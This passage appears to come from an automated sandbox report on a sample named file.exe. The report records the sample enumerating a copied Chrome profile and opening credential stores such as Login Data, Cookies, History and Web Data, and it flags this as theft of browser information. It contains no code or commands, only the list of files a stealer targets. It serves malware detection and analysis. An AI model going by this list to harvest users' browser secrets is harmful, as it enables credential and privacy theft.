Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\MEIPreload VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationGuidePredictionModels VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationHints VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\PKIMetadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SSLErrorAssistant VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SafetyTips VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\ThirdPartyModuleList64 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\WidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\pnacl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter VolumeInformationJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregationJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPSJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NELJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journalJump to behavior
